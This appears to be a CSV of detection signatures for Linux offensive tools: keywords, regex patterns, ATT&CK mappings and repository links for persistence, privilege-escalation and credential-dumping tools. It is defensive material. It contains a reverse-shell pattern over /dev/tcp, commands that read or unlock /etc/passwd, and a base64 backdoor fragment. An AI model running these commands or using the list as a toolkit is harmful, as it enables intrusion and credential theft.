"*HackTool:SH/LinuxExploitSuggest*",".{0,1000}HackTool\:SH\/LinuxExploitSuggest.{0,1000}","signature_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac - signature observed with linux-exploit-suggester.sh ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"* pamspy_event.h*",".{0,1000}\spamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"* panix.sh --*",".{0,1000}\spanix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* panix.sh --systemd*",".{0,1000}\spanix\.sh\s\-\-systemd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*cat /etc/passwd*",".{0,1000}cat\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"* prepare.sh shell/mod_*.htaccess*",".{0,1000}\sprepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1041","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
"* --publickey * --uncipherfile ./ciphered\_file*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-uncipherfile\s\.\/ciphered\\_file.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"* --rawscfile ./x86payload.bin*",".{0,1000}\s\-\-rawscfile\s\.\/x86payload\.bin.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#linux","N/A","10","10","1799","352","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z"
"* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"* reconftw.sh *",".{0,1000}\sreconftw\.sh\s.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","5789","932","2024-11-22T11:41:51Z","2020-12-30T23:52:52Z"
"*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*chattr -ia */etc/passwd*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/passwd.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"* Snake.sh *",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","#linux","N/A","10","10","1994","189","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z"
"*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"* -userpassfile ./userpass_file.txt*",".{0,1000}\s\-userpassfile\s\.\/userpass_file\.txt.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#linux","N/A","10","1","74","6","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z"
"*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*#!/bin/bash\n/bin/bash -c 'sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}\#!\/bin\/bash\\n\/bin\/bash\s\-c\s\'sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"* zsh ddexec.sh*",".{0,1000}\szsh\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*/DDexec.git*",".{0,1000}\/DDexec\.git.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*/ddexec.sh*",".{0,1000}\/ddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f*",".{0,1000}4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
